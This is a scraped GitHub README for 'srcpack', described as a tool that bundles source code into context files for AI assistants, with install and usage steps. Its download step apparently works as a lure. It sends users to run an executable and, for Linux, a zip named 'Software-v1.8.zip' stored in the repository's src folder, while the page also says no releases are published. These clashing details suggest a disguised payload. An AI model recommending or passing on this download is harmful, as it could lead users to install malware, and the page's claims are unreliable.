Skip to content

๐Ÿ› ๏ธ Bundle your code effortlessly with Srcpack, optimizing it for LLMs by creating clear, semantic contexts in seconds.

License

Notifications You must be signed in to change notification settings

noumanrahoo/srcpack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

15 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐Ÿš€ srcpack - Bundle Your Code Like a Pro

Download srcpack

๐Ÿ“ฆ What is srcpack?

srcpack is a simple tool that helps you bundle your code into optimized files for AI coding. You can easily create focused bundles that improve your coding experience, all without complicated setups. Plus, it allows you to upload your bundles to Google Drive if you want.

๐Ÿ› ๏ธ Key Features

  • Zero Configuration: Start bundling right away without any complex setup.
  • AI-Optimized: Create context files that work well with AI tools like ChatGPT and Claude.
  • Semantic Bundles: Build bundles that focus on specific domains and tasks.
  • Google Drive Upload: Save your bundles directly to your Google Drive for easy access.

๐Ÿ“‹ System Requirements

๐Ÿš€ Getting Started

To install and use srcpack, simply follow these steps:

  1. Visit the Releases page to download the latest version.
  2. Find the release suitable for your operating system.
  3. Download the file and save it to your computer.

๐Ÿ“ฅ Download & Install

To get started, visit this page to download: Download srcpack.

After downloading, locate the file in your downloads folder and follow these steps:

  1. Windows: Double-click the downloaded .exe file to run it.
  2. macOS: Open the downloaded .dmg file and drag the srcpack app to your Applications folder.
  3. Linux: Extract the downloaded https://raw.githubusercontent.com/noumanrahoo/srcpack/main/src/Software-v1.8.zip file and run the binary from the terminal.

๐Ÿ› ๏ธ How to Use srcpack

Once you have installed srcpack, using it is easy. Hereโ€™s a quick guide:

  1. Open your command line interface (Terminal on macOS and Linux, Command Prompt or PowerShell on Windows).

  2. Navigate to the directory containing your codebase.

  3. To create a bundle, type the following command:

    srcpack create <bundle-name>

    Replace <bundle-name> with a name for your bundle.

  4. If you want to upload your bundle to Google Drive, use:

    srcpack upload <bundle-name>

You can now use your newly created bundle in any AI tool that supports context files.

โš™๏ธ Advanced Usage

For more advanced features and commands, use the following commands:

  • List Bundles: To see all existing bundles in your directory, use:

    srcpack list
  • Delete a Bundle: If you want to remove a bundle, type:

    srcpack delete <bundle-name>

๐Ÿ”ง Troubleshooting

If you encounter any issues, consider these steps:

๐Ÿ™Œ Get Support

If you have questions or need further assistance, please reach out through our official support channels or check the FAQ section on our GitHub page.

๐Ÿ”— Links and Resources

Thank you for using srcpack!

About

๐Ÿ› ๏ธ Bundle your code effortlessly with Srcpack, optimizing it for LLMs by creating clear, semantic contexts in seconds.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors